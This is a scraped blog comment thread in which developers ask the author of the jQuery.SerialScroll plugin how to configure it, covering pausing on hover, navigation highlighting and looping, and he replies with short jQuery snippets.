plugins. Hi IschaGast Although that it's true, I like to keep my plugin generic, one might not want to hide them, or to use a fade, or to shrink them, should I add all the possibilities ? I don't think so, you can easily do that yourself using the onBefore. One of the arguments is the collection of elements and another one, the actual index (check the source of the demo). So you do(inside the onBefore): $('#prev,#next').show(); if( pos == 0 ) $('#prev').hide(); else if( pos == $items.length-1 ) $('#next').hide(); where prev and next are the ids, you can use any selector. Cheers Ariel, again, great plugin!!! I was wondering if it's possible to add the following to make this even more flexible. say you have a ul and you rotate through the li items. it may happen that the li items have varying heights. would it be possible to change the height of the container (ul) to match the height of the li element? so, that you could rotate through items of different heights? thanks, David Hi David That is surely a useful feature, but not something everyone will need. In my list of priorities, size is the 1st one, extensibility the 2nd, and generality the 3rd. I think the plugin lets you do that easily, without adding that to the core. In the onBefore event, you do: $pane.animate({height:$(elem).height()},800); I used the argument names of the demo, and the 800 is random. Truly, thanks for opining! As always, speedy response and just what I was looking for. I guess I wasn't really suggesting to add it to the core, but just how to do it in general. Thank you very much for the answer. I'm having a hard-time to make an "auto" news ticker (much like the demo's) stop when I hover one div ( and call stop.serialScroll ). stop.serialScroll is reached, but the complete auto-scrolling continue nonetheless. How the best way to implement a "pause on hovered element" functionnality ? Hi, Let's take the news ticker from the demo as an example, you need to do: $('#news-ticker').hover( function(){ $(this).trigger('stop'); }, function(){ $(this).trigger('start'); }); That should do :) Cheers Hi, I just can't manage to stop the autoscroll... I made an automatic news slider from your firt example, it works well, I added a button and I created a funciton taht do this : $('#stop-news').click(function(){ $('#screen').trigger( 'stop' ); }); Any help would be apreciated... Thanks for your great job ! Hi Aurélien Do you have a demo of this online ? If you are using the html from the demo.. #screen is not the element being scrolled, you need to call 'stop' on the 'target' if you specify one. It needs to be the element being scrolled. For everyone: For further comments, please use this post. Hi, This is what I was searching for: $('#prev,#next').show(); if( pos == 0 ) $('#prev').hide(); else if( pos == $items.length-1 ) $('#next').hide(); The only thing that doesn't work is this rule: if( pos == 0 ) $('#prev').hide(); It works when you go to position 2 and then go back but on loading the prev button is still visible. You can solve that with this: $('#prev').hide(); But it would be more elegant if it also worked on loading. Do you know how that is possible that it won't work? Thank you for you very quick reply the last time! Keep up the great work :) Hi... I am trying to build a horizontal news ticker from this Plugin, here is my demo page Is it possible to make this ticker scrolls horizontally and from right to left? Thanks! @IschaGast You mean, why does the button start visible when the page renders ? If so, you just hide it with css, it will obviously be visible until you click arrows. If for some reason you can't alter css, you can work around: $(document).ready(function(){ $('#pane').trigger('goto',[0]); }); @emad You can surely make it work horizontally. You can use any of ScrollTo's settings. One of them is 'axis', you set to 'x'. As for right to left, yes, since the last release, you just need to set a negative 'step' option. If you want it to start on the right, use the option 'start' and set 'force' to true. Cheers I think all the examples of SerialScroll use fixed-width items. I wrestled with jCarousel for a long while, trying to make it work with images where some were 'wide' and others were 'tall'. Before I dive in a spend lots of time, can you tell me how SerialSCroll would handle a horizontal scroll of items that have unequal widths? thanks Don Hi Don You are, all the examples have fixed size, but NO. That's not required at all. That's actually one of its major features (I should emphasize that...). It uses ScrollTo, so the plugin will jump from one item to the other, they don't need to have fixed size, or even be aligned. You just put your items wherever you want, it should work perfectly. Hi, I'm trying to do a page scroller so that the whole page would scroll allways to a next visible heading element with pressing down-key. I'm trying to use SerialScroll, but it won't scroll any further than to the first h2-element and then starts to loop with the same h2-element? Any ideas where I went wrong? My current code is: $(document).keyup(function(event){ if (event.keyCode == 40) { $.serialScroll({items:'h2',duration:700,force:true,axis:'y',offset:-10}); } }); Hi Niko, Try this: Pastebins look so much better :) Cheers oh, I had totally misunderstood that trickering thing. Many thanks, now it works like I intend, althought I changed the "force" back to a value "false" in order to not loop the whole document. Thanks, niko hi , thank for that plugin,i want use it for my portefolio online, i m beginner,i dont know about javascript, i have a question: i wish the links of my menu make reload the main container by ajax how i can do simply that action thank you very much Hi Gyzmo I don't understand what do you want this plugin to do, in relation to loading the screens by AJAX. To load the screens, check this link:AJAX docs If you need this plugin, please explain me how, and I'll help you. Cheers, for further commenting, please use this post. hi thank you for your answer sorry my explanation was not clear instead of use frame or object i wish use ajax :i just want have my menu with all my anchor and serialscroll on one other div a little similar to that exemple or that Hi Ariel, I made this: You can toggle between list view and the view with the great images. I only have one problem that can be seen when you do this: * click to the third item * click the view toggle link * click that link again Now you see that the slideshow will go back to position one. What I want is that it stays at the position it was. It that possible? I had to insert this to see the list view anyway: $('body.domenabled #item_news .item_news_container').trigger('goto', [0]); Firebug didn't return what the scroll script is doing. I think the ul is being replaced width margin-left or position relative but resetting both of the properties to 0 didn't let me see that list view. That's why that line is there. First I used the cycle plugin but after some testing the scrollTo plugin is better because it doens't change anything in your HTML. Which means you have full control! That rocks! @Gyzmo It seems like what you want is LocalScroll, not SerialScroll, right ? The 2nd demo you linked, doesn't have any kind of scroll animation, just... ajax. You don't need any plugin to do that, just jQuery. If what you need is LocalScroll, please comment on its last post. @IschaGast Welcome back :) That link you mentioned, is the one you need to remove, it's causing the container tu pull back each time. Why would you add that, if that's not what you need ? Anyway, that should solve this. Cheers That's just what I want. I want that users can switch between list-view and photo view. Some users don't want to scroll 5 times to see the last item but want to see directly how many item there are. With that link I toggle between that two views. First it wasn't really clear because it was ducth you saw. In the js you see .trigger('goto', [0]) that one I use to get the list visible because without that you only see a white screen. There are two solutions: I need to know what property is changed when moving the list items. Because setting they margin/position left of the ul to zero didn't do anything. number two: I have to remember which position the slideshow was at the moment of the swicth. When switching back it should start there. One more thing. First I tried this: .trigger('start') but that didn't do anything. I don't know why? I hope it's clear what my problem is :) I love coming back to great jQuery plugins and people that are willing to help some JS newbie's ;) I appreciate that a lot. Hi .trigger('start') is used to restart a previously stopped auto-animation. If you want auto scrolling, use the option 'interval'. I think you are approaching this in a wrong way. You should have one div/ul containing the pics with arrows. That container gets scrolled. On the other hand, you have ANOTHER div/ul that contains the list-view, this one doesn't get scrolled. If you use the option 'navigation' with the list-view items, it'll solve your problem automatically. If you need more help, you can contact me by mail if you want. Cheers Just wanted to thank you for your wonderful scrips. Keep up the great work. Cheers. Thanks Andrei!! I love this kind of posts :) Ariel, firstly let me say that this is fantastic. I'm a web designer, I code HTML and CSS but design's my passion. I know nothing about Javascript at all, and javascript and interactivity are becoming more and more popular, and it's free plugins like this that make my life so much easier! So thank you! I do have one question. I'm using the code from the first example, the navigation one. I've edited it slightly so that 3 li's appear at once in the sections div, and also so that each click of the arrow scrolls past 3 li's. I'm using 6 li's, so you see the first 3, then scroll to 4 5 and 6, and then another scroll just shows the last one again on it's own - is there anyway that once the last 3 are shown, it cycles back to the start again rather than just showing the last one again on its own? I hope this makes sense and you can help me, if it can't be done I can probably live without, but if there's something I'm missing or doing wrong it would be great to have a kick in the right direction! Once again many thanks for this script whether I get my bug fixed or not, it's great. Hi Matt Can you give me a link to this so I can see? You can mail it to me if you don't want to make it public. Thanks Hi Ariel, I just sent an email to your gmail account, thanks! Love the script! Quick question .. is there a way to highlight the navigation when you're on the corresponding/current "section"? It's great as it is, but it would be nice to see where you're at in the slides in the navigation as well. Thanks again!! Hi Ringo Yes, you do that yourself using the onBefore event, it receives all the information you need. I want to make a post with some patterns for this plugin, but I'm being lazy :) Cheers ah. looks like it's been mentioned before. thanks. .. and thanks for being so patient & helpful with everyone and their questions! Hello Ariel, is there any way to launch onBefore at the initialization of the SerialScroll? I'd like my right arrow to be disabled if there isn't items to be scrolled (i.e. if there's only one) and I don't know how to do it except using the onBefore method, which knows the items length. Thanks for your answer and your plugin. Nico Hi Nico You can do $('#pane').trigger('goto',[0]); To force it, but you'll need to set 'start' to 1 or something else, so there is a change. Cheers Hi Ariel, Ben here. Would it be possible to make it so if a user holds down their mouse button over the arrow it'll keep scrolling until released? I know I could apply an onmouseover event, but I would prefer it to only keep scrolling if the mouse button is pressed. Cheers. p.s. Great plugins! Hi Ben, thanks That will require the mousehold plugin for jQuery and in the callback, you use $('...').trigger('next'); Ciao Ariel, This is a life savor! Can you tell is there a way to have it on a continuous loop? So instead of it essentially rewinding when cycle is true, the next item shown would be the first item shown. Thanks, Kurt Hi No, the plugin avoids doing dom manipulation, so something like this, has to be done by the end developer. You can do this using the onBefore and onAfter, but I foresee quite complicated code. Cheers Thanks! I wonder if it would work with your rotater script? VERY clever, never thought about that :) Let me know if you do use it. Thanks Hello! Thanks for the great script. One of my divs has a form in it. When the form is submitted, it gives a success or error message in that same section. How do I make the php form go back to that same section when the form is submitted and the page reloads instead of showing the first section? Thanks a lot. Hi I haven't done this, but try adding an "id" to the section, then in the action of the form, add #id_of_section. That should make the browser focus the section. Hope it works well Thanks for the suggestion. I tried that. When the form is submitted. It goes back to the form section (section 3) for a sec then goes to the first slide right away. What do you think is causing that? Remove the part that says: force:true, It worked! You rule. Thanks I want to scroll item from bottom, and stop when mouse over. Please help me. Ariel, this is working great! I have to admit, I'm a newcomer to javascript and jquery, and I'm trying to do something very simple that I'm having trouble with. I want to be able to activate the scoll event from within the object. So, each item in the panel contains a button to go forward and back, but even using selectors to traverse the innerHTML, it doesn't recognize these links. When I put the links outside of the panel, it starts working. I'm sure this is an easy solution, but I've been working on this for a few hours now.... E-mail me if you'd like a link to what I'm working on. @Anonymous(use a name plz) To scroll from bottom, check the post called "Doctorate on jQuery.SerialScroll" there's one script that is right-to-left/bottom-to-top. As for stopping on mouseover, there's a script too. Just combine both (use axis:'y' for vertical scrolling). @jj To externally manipulate the widget, use the custom events described above. I don't know your email, send me one to the address on the right, I'll reply to you asap. Cheers Ariel, I started messing around with SerialScroll after just recently playing with localScroll. Is it possible to have content loaded externally which contains the content I want to serialScroll. I ask because I know I would probably have to use liveQuery or is there a "lazy" attribute that can be used for SerialScroll? Jeff Hi Jeff SerialScroll has the option 'lazy' as well ( read the docs! :) ). Only the items can de dynamic, that is, you must keep the scrollable pane, 'prev', 'next' and 'navigation' if used. Note that if you need lazy navigation, you can safely combine it with LocalScroll. Hi, This is a probably a really simple question, but how do I add a link URL to the image currently shown ? The ones either side go left or right, but I want the central one to launch a URL. Thank Darren I imagine you're using the option 'jump'. What you want is something quite specific. You should code that with your own click binding, or using the onBefore function. Cheers Thanks Ariel, I have managed to get everything working now but one thing still niggles... I have set the scroll to start on a different item than the first one in the list but can't seem to work out how to make it highlighted with the 'selected' class. Should I be using the onBefore function again? (Please see:) Thanks again for all your support! Instead of using start+force, trigger a goto event by yourself. Hi Ariel, great tool! While testing this tool I noticed the 'start' feature does not work well on Safari -- who uses Safari? I dont know, but just thought I'd let you know. Also, on a post on May 31st some dude was asking how enable links on a particular slide... im not very familiar with OnBefore or JQuery, can you give me push in the right direction? Thanks again for this amazing tool. Omid S Hi Omid The option start surely works. It just tells the plugin to start on a different position than 0. I do test everything on Safari. As for the second part, I don't quite get what you mean. The onBefore is a setting of the plugin. A function called before each slide. Sadly the online demo is out of service, but if you read the docs, you should be able to see how it works. Ping me by email if you need more help. Cheers Ariel, great plugin! One thing though, is that it would be nice if there were a destroy() method that unbinds all the events and resets all the properties that Serial Scroll adds to the container and child elements. That way you could "re-initialize" SerialScroll on the same container more than once. Hi Sean SerialScroll doesn't add any property to any element. The only change is event binding. I didn't add this method, as it's not usually needed and it's very easy to do that manually. You need to unbind w/e you chose as 'event' (click by default) from the arrows. Then unbind it from the container (if 'lazy') or the items. Finally, unbind('.serialScroll') from the container. Note that you prolly don't need to rebind, for dynamic content do consider the option 'lazy'. Thanks for the Great Plugin! I'm having an issues with SerialScroll not working in IE...Safari and FF 3.0 work great. here is the link to the page: the plus/minus arrows are the next/prev. Any help is much appreciated. Thanks! Hi Add position:relative to #article_container. Cheers Perfect!, thanks! Hi, I have container where i animate the products and a pager which are gray dots and onclick on any gray dot, after animating the product, i need to take the id of JUST CLICKED gray dot and assign css class as 'ACTIVE' (yellow dot) and the rest of gray dots should go 'inactive' (gray dot) I see the alert many times but it should show the alert just once. here is code: If you see an alert saying 'i am a good link', that appear many times it might be a stupid question but i am sorry, i am not that good in jQuery and other point is that if i take this block of code outside onAfter, its not working. Please help Try this: @Ariel Flesler Thanks for your reply and effort for writing me a code but still its not working. I put and alert on elem.id and i got nothing(empty) in alert. Can u please explain what is elem and how can i access its contents. Will it be the link clicked to animate the pane? or the pane being animate. thanks for ur reply and efforts. It looks great except this problem. Hi Aamir My bad, try this instead: It uses the onBefore instead of onAfter, so it'll happen when the animation starts. But it receives more arguments and makes this easier. Cheers Hey! Great work. Your advice to add position:relative to the container is VERY important. I was frustrated a good night trying to figure out why IE7 wasn't scrolling my div elements that contained links. (Worked with images though, weird). Anyway, thanks for the great work! Is is possible to use the OnAfter function to show a particular DIV layer when you have scrolled to an image. For instance, I have 5 images I'm scrolling through. When I stop at image 3 I would like DIV 3 to appear beside it. So DIV 1 becomes hidden and DIV 3 becomes visible. Is that possible please? Hi Yes, the first argument of the onAfter is the element you scrolled to. Using it, you can find its corresponding div and show it. You keep the previous div in a external variable and hide it, then save the new div into the var. Great plugin. But since I'm a noob at jquery and javascript, I can't get past one problem. I'm putting href links in some text blocks in the li tags, but when I click that link, nothing happens. I suspect it's because the script is set up to advance the scroll on the click event, but I don't know any way around it. Mind suggesting how to change this? If I'm not getting your problem incorrectly, you have 2 options. 1- If you're using the option 'jump' as true, then set that to false. 2- Add this code: Cheers Hello again, I want it very similar to this one but without the gap at the bottom when it ends. How do you control the speed too? thanks! Ariel, We are willing to pay if you can help us fix the problems on Basically we need it to pause on rollover and also have a continous cycle, with no gap between the bottom of the last item and when it starts over. Just let us know if you can help us and how much you want to charge. The client is getting antsy so we need to get it done soon. THe current live homepage at has another script which works fine but the client does not like the gap at the bottom of the content. So that's why we are trying to use your awesome script. Thanks alot! Kevin Hi Kevin Contact me by IM or email. I have Gtalk and MSN. aflesler[a]gmail flesler[a]hotmail Hello Ariel, today I tried your really great plugin. But is it possible that the 'cycle' does not really work? I tried your demo and as far as I understood it shall endless scroll in ONE direction but the scroll is "bouncing"? Did I understood something wrong or where is my mistake ('caus such a endless scroller in one direction is exacly what I need and I'm looking for...) Thanks for your help and best regards, Lars Hi Lars Indeed, the option 'cycle' does bounce. Having an endless animation would require to move/clone elements, that is something the plugin won't do. You can do that yourself using the onBefore. You need to set the option 'lazy' to true, and clone/append elements as it scrolls. It will continue the animation naturally. Hi Ariel, thanks for the answer. Could you imagine to provide such a feature in one of the next releases? It would be really great :) greetings, Lars Hi I can provide a way of doing that with a separate script, like I did for other kind of situations. But not into the plugin itself. I keep it generic and there isn't one single way of doing this, and it wouldn't satisfy any situation. Hi, that would be very kind and great. Looking forward :) Thanks a lot, Lars Hi Ariel, I'm using your plugin to scroll logos horizontally across a banner, I've got it all working as I want, and now I'm trying to make the animation stop whenever I mouseover a logo and then restart when I mouseout. I've created a function on mouseover of the logos that calls $(container).stop() but it doesn't seem to be working properly. The animation bounces a around back and forth a little instead of stopping completely, and then on mouseout it resumes it's steady scroll. Do you know what might be causing this behavior? Also, I'd be interested in what Lars mentioned about a solution to scroll endlessly in one direction rather then bouncing from one side to the next when using cycle. Oh BTW, thanks for such a great plugin! I searched around a lot for the best solution for my needs before finally coming to your plugin. HI Benek Check the blog post called "Doctorate on SerialScroll", it has the snippet to do that. As for the endless scrolling, it's doable, I just haven't made a model call yet :) Thank you so much for the quick reply. I got you snippet and it works like a dream. Excellent plugin! Your Plugin works great. but i want to do something like this. when user clicks on the next button and the slide is last. then instead of moving around from last slide to first slide. it will show directly first slide. can you tell me how to do this ? thank you very much for nice plugin. Hi Hardik To make it scroll instantly you'll need to use jQuery.ScrollTo. here you have a draft of a possible solution (you need to fill some parts). If you just want it to scroll 'faster' in that case, you can try setting the option 'constant' to false. I got a DIV with text in it, it's height is 300px. i want to make a custom scrollbar with a smooth flow. i thought i could use your plugin, but i still didnt manage how... could you help me out please? Hi, this plugin is to scroll "item-wise", that is thru items. To just scroll a container, you can use just $.scrollTo (serialScroll's base plugin). You simply tell it to scroll to some place whenever you need. how do you control whether or not when you click on the link, the page moves to the top of that ID after scrolling? That is prevented (e.preventDefault()) as that is the expected behavior on most cases. You can bind your own handler to enforce this behavior if you want. $('a.some_links').click(function(){ location = this.href; }); Ariel, Is it possible with this script to scroll to an area in a map? Hi Robert You should, if you're having problems, get me a demo of the prob online and I'll check. Hi Ariel Love the plugin - it does exactly what I want. I am using it to show a horizontal series of product thumbnails that I want to continuously cycle. Everything works great, except that when it reaches the end there is a significant pause before the scrolling "bounces" back. Is this configurable, or is it a pause while it calculates? The settings I'm using are: items:'div', duration:2000, force:true, axis:'x', easing:'linear', interval:1, cycle:true I can show you my work in progress if you want, but I don't want to display it on a public message at this point. Thanks Rob Hi Rob Send me a link by email and I'll check that. Hello! How to highlight navigation link when section active? Please help! Hi, you can do that with an external (click) binding, or inside the onBefore. If you use the event, then one of the parameters is the selected index. That's all you need (check LocalScroll's demo which does this). This is a really nice plugin. Would it be possible to change the speed on a click? What I am trying to do is stop auto-scrolling when a next/prev button is clicked, and I would like the scrolling to then happen faster. Should I just set serial scroll again and differently? Or is there a way to just reset some properties? Hi Frances You can't access the settings object after you call the plugin (I plan to add this). You can certainly call the plugin twice. Once specifying prev/next and the other the 'interval'. Hi Ariel, I'm trying to set up your script, I'm think that is amazing, but at the present I'm really frustrated 'cause I don't get it up. If I repeat your serialScroll demo, it works smoothly, but if I try with SerialScroll_right-to-left (which is the one I need), nothing happens in my browser. Following your example I'm using in my head section: Is that order accurate? Did I forget something? Thanks in advance. Those snippets are of course 'models'. You need to shape them up to your html and fill some blanks too. this is a great plug in, good job. Quick question: Is it possible to control the next/previous actions from arrow key presses instead of href="#" ? You're confusing plugins. LocalScroll works with href's. SerialScroll doesn't. You can manipulate it with the keyboard, check the post called "Doctorate on SerialScroll". Being able to access the settings after you have specified them would be really fantastic. Apart from that, it has made setting up a ticker/scroller fantastically easy. Thanks. Ok thanks. I do have that mind for a next release.. Hi, first I want to say thank you very much for this great work for all your plugins! Now I have a problem with Safari, Chrome and Opera browsers. When I use an anchor for prev/next like: prev: 'a.left', next: 'a.right', If I use it with an img-element it works: prev: 'img.left', next: 'img.right', you can see the problem on beta.brandworkers.com BR, Jan
http://flesler.blogspot.com/2008/02/jqueryserialscroll.html?showComment=1222081140000
CC-MAIN-2017-26
refinedweb
8,171
75
4828/python-set-union-and-set-intersection-operate-differently I'm doing some set operations in Python, and I noticed something odd.. >> set([1,2,3]) | set([2,3,4]) set([1, 2, 3, 4]) >> set().union(*[[1,2,3], [2,3,4]]) set([1, 2, 3, 4]) That's good, expected behaviour - but with intersection: >> set([1,2,3]) & set([2,3,4]) set([2, 3]) >> set().intersection(*[[1,2,3], [2,3,4]]) set([]) Am I losing my mind here? Why isn't set.intersection() operating as I'd expect it to? How can I do the intersection of many sets as I did with union (assuming the [[1,2,3], [2,3,4]]had a whole bunch more lists)? What would the "pythonic" way be? When you do set() you are creating an empty set. When you do set().intersection(...) you are intersecting this empty set with other stuff. The intersection of an empty set with any other collection of sets is empty. If you actually have a list of sets, you can get their intersection similar to how you did it. >>> x = [{1, 2, 3}, {2, 3, 4}, {3, 4, 5}] >>> set.intersection(*x) set([3]) You can't do this directly with the way you're doing it, though, because you don't actually have any sets at all in your example with intersection(*...). You just have a list of lists. You should first convert the elements in your list to sets. So if you have x = [[1,2,3], [2,3,4]] you should do x = [set(a) for a in x] Install python from this link After ...READ MORE TRY THIS #Nomalisation for i in names: print(i) ...READ MORE AND - True if both the operands ...READ MORE A module is a file containing a ...READ MORE down voteaccepted ++ is not an operator. It is ...READ MORE file = open('text.txt', 'w+) READ MORE if you are familiar with C programming, ...READ MORE In cases when we don’t know how ...READ MORE You probably want to use np.ravel_multi_index: [code] import numpy ...READ MORE Here's the short answer: disable any antivirus or ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/4828/python-set-union-and-set-intersection-operate-differently?show=4830
CC-MAIN-2019-51
refinedweb
370
77.64
Rechercher une page de manuel wcsrtombs Langue: en Version: 1999-07-25 (fedora - 01/12/10) Section: 3 (Bibliothèques de fonctions) NAMEwcsrtombs - convert a wide-character string to a multibyte string SYNOPSIS #include <wchar.h> size_t wcsrtombs(char *dest, const wchar_t **src, size_t len, mbstate_t *ps); DESCRIPTIONIf dest is not a NULL pointer, Laq\0aq (which has the side effect of bringing back *ps to the initial state). In this case *src is set to NULL, and the number of bytes written to dest, excluding the terminating aq\0aq byte, is returned. If dest is NULL, len is ignored, and the conversion proceeds as above, except that the converted bytes are not written out to memory, and that no length limit exists. In both of the above cases, if ps is a NULL pointer, a static anonymous state only known to the wcsrtombs function is used instead. The programmer must ensure that there is room for at least len bytes at dest. RETURN VALUETheC99. NOTESThe behavior of wcsrtombs() depends on the LC_CTYPE category of the current locale. Passing NULL as ps is not multithread safe. SEE ALSOiconv(3), wcsnrtombs(3), wcstombs
https://www.linuxcertif.com/man/3/wcsrtombs/en/
CC-MAIN-2022-27
refinedweb
191
59.64
- Published on Building the Tailwind Blog with Next.js - Authors - Name - Adam Wathan - @adamwathan One of the things we believe as a team is that everything we make should be sealed with a blog post. Forcing ourselves to write up a short announcement post for every project we work on acts as a built-in quality check, making sure that we never call a project "done" until we feel comfortable telling the world it's out there. The problem was that up until today, we didn't actually have anywhere to publish those posts! Choosing a platform We're a team of developers so naturally there was no way we could convince ourselves to use something off-the-shelf, and opted to build something simple and custom with Next.js. There are a lot of things to like about Next.js, but the primary reason we decided to use it is that it has great support for MDX, which is the format we wanted to use to author our posts. # My first MDX post MDX is a really cool authoring format because it lets you embed React components right in your markdown: <MyComponent myProp={5} /> How cool is that? MDX is really interesting because unlike regular Markdown, you can embed live React components directly in your content. This is exciting because it unlocks a lot of opportunities in how you communicate ideas in your writing. Instead of relying only on images, videos, or code blocks, you can build interactive demos and stick them directly between two paragraphs of content, without throwing away the ergonomics of authoring in Markdown. We're planning to do a redesign and rebuild of the Tailwind CSS documentation site later this year and being able to embed interactive components makes a huge difference in our ability to teach how the framework works, so using our little blog site as a test project made a lot of sense. Organizing our content We started by writing posts as simple MDX documents that lived directly in the pages directory. Eventually though we realized that just about every post would also have associated assets, for example an Open Graph image at the bare minimum. Having to store those in another folder felt a bit sloppy, so we decided instead to give every post its own folder in the pages directory, and put the post content in an index.mdx file. public/ src/ ├── components/ ├── css/ ├── img/ └── pages/ ├── building-the-tailwindcss-blog/ │ ├── index.mdx │ └── card.jpeg ├── introducing-linting-for-tailwindcss-intellisense/ │ ├── index.mdx │ ├── css.png │ ├── html.png │ └── card.jpeg ├── _app.js ├── _document.js └── index.js next.config.js package.json postcss.config.js README.md tailwind.config.js This let us co-locate any assets for that post in the same folder, and leverage webpack's file-loader to import those assets directly into the post. Metadata We store metadata about each post in a meta object that we export at the top of each MDX file: import { bradlc } from '@/authors' import openGraphImage from './card.jpeg' export const meta = { title: 'Introducing linting for Tailwind CSS IntelliSense', description: `Today we’re releasing a new version of the Tailwind CSS IntelliSense extension for Visual Studio Code that adds Tailwind-specific linting to both your CSS and your markup.`, date: '2020-06-23T18:52:03Z', authors: [bradlc], image: openGraphImage, discussion: '', } // Post content goes here This is where we define the post title (used for the actual h1 on the post page and the page title), the description (for Open Graph previews), the publish date, the authors, the Open Graph image, and a link to the GitHub Discussions thread for the post. We store all of our authors data in a separate file that just contains each team member's name, Twitter handle, and avatar. import adamwathanAvatar from './img/adamwathan.jpg' import bradlcAvatar from './img/bradlc.jpg' import steveschogerAvatar from './img/steveschoger.jpg' export const adamwathan = { name: 'Adam Wathan', twitter: '@adamwathan', avatar: adamwathanAvatar, } export const bradlc = { name: 'Brad Cornes', twitter: '@bradlc', avatar: bradlcAvatar, } export const steveschoger = { name: 'Steve Schoger', twitter: '@steveschoger', avatar: steveschogerAvatar, } The nice thing about actually importing the author object into a post instead of connecting it through some sort of identifier is that we can easily add an author inline if we wanted to: export const meta = { title: 'An example of a guest post by someone not on the team', authors: [ { name: 'Simon Vrachliotis', twitter: '@simonswiss', avatar: '', }, ], // ... } This makes it easy for us to keep author information in sync by giving it a central source of truth, but doesn't give up any flexibility. Displaying post previews We wanted to display previews for each post on the homepage, and this turned out to be a surprisingly challenging problem. Essentially what we wanted to be able to do was use the getStaticProps feature of Next.js to get a list of all the posts at build-time, extract the information we need, and pass that in to the actual page component to render. The challenge is that we wanted to do this without actually importing every single page, because that would mean that our bundle for the homepage would contain every single blog post for the entire site, leading to a much bigger bundle than necessary. Maybe not a big deal right now when we only have a couple of posts, but once you're up to dozens or hundreds of posts that's a lot of wasted bytes. We tried a few different approaches but the one we settled on was using webpack's resourceQuery feature combined with a couple of custom loaders to make it possible to load each blog post in two formats: - The entire post, used for post pages. - The post preview, where we load the minimum data needed for the homepage. The way we set it up, any time we add a ?preview query to the end of an import for an individual post, we get back a much smaller version of that post that just includes the metadata and the preview excerpt, rather than the entire post content. Here's a snippet of what that custom loader looks like: { resourceQuery: /preview/, use: [ ...mdx, createLoader(function (src) { if (src.includes('<!--more-->')) { const [preview] = src.split('<!--more-->') return this.callback(null, preview) } const [preview] = src.split('<!--/excerpt-->') return this.callback(null, preview.replace('<!--excerpt-->', '')) }), ], }, It lets us define the excerpt for each post either by sticking <!--more--> after the intro paragraph, or by wrapping the excerpt in a pair of <!--excerpt--> and <!--/excerpt--> tags, allowing us to write an excerpt that's completely independent from the post content. export const meta = { // ... } This is the beginning of the post, and what we'd like to show on the homepage. <!--more--> Anything after that is not included in the bundle unless you are actually viewing that post. Solving this problem in an elegant way was pretty challenging, but ultimately it was cool to come up with a solution that let us keep everything in one file instead of using a separate file for the preview and the actual post content. Generating next/previous post links The last challenge we had when building this simple site was being able to include links to the next and previous post whenever you're viewing an individual post. At its core, what we needed to do was load up all of the posts (ideally at build-time), find the current post in that list, then grab the post that came before and the post that came after so we could pass those through to the page component as props. This ended up being harder than we expected, because it turns out that MDX doesn't currently support getStaticProps the way you'd normally use it. You can't actually export it directly from your MDX files, instead you have to store your code in a separate file and re-export it from there. We didn't want to load this extra code when just importing our post previews on the homepage, and we also didn't want to have to repeat this code in every single post, so we decided to prepend this export to the beginning of each post using another custom loader: { use: [ ...mdx, createLoader(function (src) { const content = [ 'import Post from "@/components/Post"', 'export { getStaticProps } from "@/getStaticProps"', src, 'export default (props) => <Post meta={meta} {...props} />', ].join('\n') if (content.includes('<!--more-->')) { return this.callback(null, content.split('<!--more-->').join('\n')) } return this.callback(null, content.replace(/<!--excerpt-->.*<!--\/excerpt-->/s, '')) }), ], } We also needed to use this custom loader to actually pass those static props to our Post component, so we appended that extra export you see above as well. This wasn't the only issue though. It turns out getStaticProps doesn't give you any information about the current page being rendered, so we had no way of knowing what post we were looking at when trying to determine the next and previous posts. I suspect this is solvable, but due to time constraints we opted to do more of that work on the client and less at build time, so we could actually see what the current route was when trying to figure out which links we needed. We load up all of the posts in getStaticProps, and map them to very lightweight objects that just contain the URL for the post, and the post title: import getAllPostPreviews from '@/getAllPostPreviews' export async function getStaticProps() { return { props: { posts: getAllPostPreviews().map((post) => ({ title: post.module.meta.title, link: post.link.substr(1), })), }, } } Then in our actual Post layout component, we use the current route to determine the next and previous posts: export default function Post({ meta, children, posts }) { const router = useRouter() const postIndex = posts.findIndex((post) => post.link === router.pathname) const previous = posts[postIndex + 1] const next = posts[postIndex - 1] // ... } This works well enough for now, but again long-term I'd like to figure out a simpler solution that lets us load only the next and previous posts in getStaticProps instead of the entire thing. There's an interesting library by Hashicorp designed to make it possible to treat MDX files like a data source called Next MDX Remote that we will probably explore in the future. It should let us switch to dynamic slug-based routing which would give us access to the current pathname in getStaticProps and give us a lot more power. Wrapping up Overall, building this little site with Next.js was a fun learning experience. I'm always surprised at how complicated seemingly simple things end up being with a lot of these tools, but I'm very bullish on the future of Next.js and looking forward to building the next iteration of tailwindcss.com with it in the months to come. If you're interested in checking out the codebase for this blog or even submitting a pull request to simplify any of the things I mentioned above, check out the repository on GitHub. Want to talk about this post? Discuss this on GitHub →
https://blog.tailwindcss.com/building-the-tailwind-blog
CC-MAIN-2021-04
refinedweb
1,837
57.71
Finding a User on a Non-Default Domain I have two domains on my OpenStack setup - 'default' and 'domain1'. Using the python API, I need to find a user(using the name attribute) on a non default domain. I tried to do it using the keystone client both as the default admin and domain1's admin. As the default Admin - If I use the UI I need to set the domain context to be able to view the users of another domain. Is there anyway I could do this using the Python API? As it stands the search is restricted to users of the default domain. As the domain1 admin - If I call the projects.find function as the domain1 admin, it returns a not authorized function as it tries to run the list_users function without setting the domain to domain1. Is there anyway to do that? This is my code: from keystoneauth1.identity import v3 from keystoneauth1 import session from keystoneclient.v3 import clientcreds = get_keystone_creds() # gets the credentials from the environment auth = v3.Password(**creds) sess = session.Session(auth=auth) ks = client.Client(session= sess) user = ks.users.find(name = 'testuser')
https://ask.openstack.org/en/question/95620/finding-a-user-on-a-non-default-domain/
CC-MAIN-2019-26
refinedweb
192
68.06
0 Oje me again... :$ Hello everyone... I have a superclass Human and a subclass Warrior. Problem is, human got this method: public void Reveal() { System.out.println("I am " + name + ". "); System.out.println("My Strength is " + strength + " my Health is " + health); System.out.println("My Intelligence is " + intelligence + " and my Agility is " + agility); } My warrior inherits this method but i got changes in this method. So i placed this code in my warrior class: public void Reveal() { System.out.println("I am " + name + " the Destroyer "); System.out.println("My Strength is " + (strength +20) + " my Health is " + (health +50)); System.out.println("My Intelligence is " + (intelligence - 30) + " and my Agility is " + (agility - 20)); } The thing is, i inputed all these atributes and now the warrior should show me an output where strength is +20 higher then the number inputet. Ex.: input 50 output 70 But it doesn´t... i gives me only the output from the superclass method. It shouldn´t be like that. The class with the main looks like this: public class TestHuman { public static void main(String[] arguements) { Human Hobject = new Human(); Hobject.MyChar(); Hobject.Reveal(); } } Thank you for looking over it.
https://www.daniweb.com/programming/software-development/threads/267638/subclass-method-doesn-t-overwrite-superclass-method
CC-MAIN-2017-04
refinedweb
194
59.9
